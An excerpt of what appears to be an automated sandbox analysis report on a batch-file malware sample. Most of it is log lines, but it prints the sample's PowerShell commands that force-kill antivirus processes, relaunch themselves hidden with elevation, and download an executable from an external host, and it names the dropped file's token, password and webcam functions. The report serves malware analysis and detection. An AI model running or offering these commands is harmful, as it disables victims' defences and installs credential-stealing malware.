        Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
        Source: C:\Windows\explorer.exe Section loaded: rasadhlp.dll
        Source: C:\Windows\explorer.exe Section loaded: fwpuclnt.dll
        Source: C:\Windows\explorer.exe Section loaded: schannel.dll
        Source: C:\Windows\explorer.exe Section loaded: mskeyprotect.dll
        Source: C:\Windows\explorer.exe Section loaded: ntasn1.dll
        Source: C:\Windows\explorer.exe Section loaded: ncrypt.dll
        Source: C:\Windows\explorer.exe Section loaded: ncryptsslp.dll
        Source: C:\Windows\explorer.exe Section loaded: gpapi.dll
        Source: C:\Windows\explorer.exe Section loaded: pcshellcommonproxystub.dll
        Source: C:\Windows\explorer.exe Section loaded: cryptngc.dll
        Source: C:\Windows\explorer.exe Section loaded: cflapi.dll
        Source: C:\Windows\explorer.exe Section loaded: execmodelproxy.dll
        Source: C:\Windows\explorer.exe Section loaded: daxexec.dll
        Source: C:\Windows\explorer.exe Section loaded: container.dll
        Source: C:\Windows\explorer.exe Section loaded: shellcommoncommonproxystub.dll
        Source: C:\Windows\explorer.exe Section loaded: uiautomationcore.dll
        Source: C:\Windows\explorer.exe Section loaded: stobject.dll
        Source: C:\Windows\explorer.exe Section loaded: wmiclnt.dll
        Source: C:\Windows\explorer.exe Section loaded: workfoldersshell.dll
        Source: C:\Windows\explorer.exe Section loaded: windows.fileexplorer.common.dll
        Source: C:\Windows\explorer.exe Section loaded: samlib.dll
        Source: C:\Windows\explorer.exe Section loaded: batmeter.dll
        Source: C:\Windows\explorer.exe Section loaded: capabilityaccessmanagerclient.dll
        Source: C:\Windows\explorer.exe Section loaded: sxs.dll
        Source: C:\Windows\explorer.exe Section loaded: inputswitch.dll
        Source: C:\Windows\explorer.exe Section loaded: es.dll
        Source: C:\Windows\explorer.exe Section loaded: prnfldr.dll
        Source: C:\Windows\explorer.exe Section loaded: windows.ui.shell.dll
        Source: C:\Windows\explorer.exe Section loaded: wpnclient.dll
        Source: C:\Windows\explorer.exe Section loaded: dxp.dll
        Source: C:\Windows\explorer.exe Section loaded: shdocvw.dll
        Source: C:\Windows\explorer.exe Section loaded: syncreg.dll
        Source: C:\Windows\explorer.exe Section loaded: atlthunk.dll
        Source: C:\Windows\explorer.exe Section loaded: actioncenter.dll
        Source: C:\Windows\explorer.exe Section loaded: wevtapi.dll
        Source: C:\Windows\explorer.exe Section loaded: audioses.dll
        Source: C:\Windows\explorer.exe Section loaded: pnidui.dll
        Source: C:\Windows\explorer.exe Section loaded: mobilenetworking.dll
        Source: C:\Windows\explorer.exe Section loaded: netprofm.dll
        Source: C:\Windows\explorer.exe Section loaded: wscinterop.dll
        Source: C:\Windows\explorer.exe Section loaded: wscapi.dll
        Source: C:\Windows\explorer.exe Section loaded: networkuxbroker.dll
        Source: C:\Windows\explorer.exe Section loaded: ethernetmediamanager.dll
        Source: C:\Windows\explorer.exe Section loaded: werconcpl.dll
        Source: C:\Windows\explorer.exe Section loaded: framedynos.dll
        Source: C:\Windows\explorer.exe Section loaded: wer.dll
        Source: C:\Windows\explorer.exe Section loaded: hcproviders.dll
        Source: C:\Windows\explorer.exe Section loaded: dusmapi.dll
        Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
        Source: Window Recorder Window detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000014.00000002.2132008073.00000224BB954000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: softy.pdb9 source: powershell.exe, 00000023.00000002.2656267224.000002D2E052C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb{ source: powershell.exe, 00000014.00000002.2136799854.00000224BBAF0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: tomation.pdb source: powershell.exe, 00000009.00000002.1493577612.000002699181D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1524477975.00000269AB862000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1526310397.00000269ABB8D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2132008073.00000224BB8AE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000023.00000002.2673504080.000002D2E06EA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mscorlib.pdb source: powershell.exe, 00000014.00000002.2132008073.00000224BB880000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2656267224.000002D2E052C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: n.pdb source: powershell.exe, 00000009.00000002.1526310397.00000269ABB99000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbu38 source: powershell.exe, 00000014.00000002.2132008073.00000224BB954000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32( source: powershell.exe, 00000014.00000002.1953599209.00000224A1939000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: 6?ll\mscorlib.pdb source: powershell.exe, 00000023.00000002.2656267224.000002D2E052C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: softy.pdb3 source: powershell.exe, 00000023.00000002.2656267224.000002D2E052C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1526310397.00000269ABB70000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.pdb source: powershell.exe, 00000009.00000002.1496227351.0000026994FB9000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.pdbhPM source: powershell.exe, 00000009.00000002.1496227351.0000026994FB9000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: ion.pdb source: powershell.exe, 00000009.00000002.1524477975.00000269AB862000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbQ*V source: powershell.exe, 00000023.00000002.2656267224.000002D2E052C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.pdbneAutomation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dllmands.Utility.dllt.dll source: powershell.exe, 00000009.00000002.1493577612.000002699181D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: em.Core.pdbk source: powershell.exe, 00000009.00000002.1526310397.00000269ABB70000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: em.Core.pdb source: powershell.exe, 00000009.00000002.1526310397.00000269ABB70000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdbi source: powershell.exe, 00000009.00000002.1524477975.00000269AB862000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ion.pdb71 source: powershell.exe, 00000009.00000002.1526310397.00000269ABB70000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: *on.pdb source: powershell.exe, 00000009.00000002.1524477975.00000269AB862000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        Source: exe.exe.32.dr, Program.cs .Net Code: LoadDll System.Reflection.Assembly.Load(byte[])
        Source: exe.exe.32.dr, Program.cs .Net Code: password
        Source: exe.exe.32.dr, Program.cs .Net Code: webcampic
        Source: exe.exe.32.dr, Program.cs .Net Code: select_cam
        Source: exe.exe.32.dr, Program.cs .Net Code: get_cams
        Source: exe.exe.32.dr, Program.cs .Net Code: get_tokens
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$s='taskkill /F /IM'; $p=@('m'+'bam.exe','mbam'+'service.exe','avast'+'svc.exe','avast'+'ui.exe','a'+'vp.exe','avg'+'ui.exe','bd'+'agent.exe','bddownloader.exe','bdre'+'dline.exe','bd'+'ss.exe','bdserv'+'icehost.exe','bdnagent.exe','bds'+'can.exe','bdc'+'ore.exe'); foreach($i in $p){iex \"$s \"$i\"\"};"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent()); if (-not $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Start-Process -FilePath 'cmd.exe' -ArgumentList '/c C:\Users\user\Desktop\main.bat.bin.bat' -Verb RunAs -WindowStyle Hidden; exit }; $process = Get-Process -Id $PID; $process.PriorityClass = 'High'; $process.ProcessorAffinity = 1; $process.PriorityBoostEnabled = $true"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Stop-Process -Name MSASCui -Force -ErrorAction SilentlyContinue"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$processes = @('mbam', 'mbamservice', 'avastsvc', 'avastui', 'avp', 'avgui', 'bdagent', 'bddownloader', 'bdredline', 'bdss', 'bdservicehost', 'bdnagent', 'bdscan', 'bdcore'); foreach ($p in $processes) { Stop-Process -Name $p -Force -ErrorAction SilentlyContinue }"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Stop-Process -Name explorer -Force -ErrorAction SilentlyContinue"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')"
        Source: exe.exe.32.dr Static PE information: 0xD6D709DC [Mon Mar 20 18:56:28 2084 UTC]
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFB4B2900BD pushad ; iretd 9_2_00007FFB4B2900C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFB4B282325 push eax; iretd 12_2_00007FFB4B28233D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_00007FFB4B2C09AD push ss; ret 21_2_00007FFB4B2C09C6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFB4E7F0790 push E958E01Ch; ret 35_2_00007FFB4E7F0909
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFB4E7F752B push ebx; iretd 35_2_00007FFB4E7F756A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFB4E7FBAE0 push eax; retf 35_2_00007FFB4E7FBBD3
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFB4E7FBBE4 push eax; retf 35_2_00007FFB4E7FBBD3
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFB4E7F08BD push E958E01Ch; ret 35_2_00007FFB4E7F0909
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFB4E7F090A push E958E01Ch; ret 35_2_00007FFB4E7F0909
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFB4E7F9258 push E8FFFFFFh; iretd 35_2_00007FFB4E7F925D

        Persistence and Installation Behavior

        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Documents\Secret Document\exe.exe
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.dll

        Hooking and other Techniques for Hiding and Protection

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
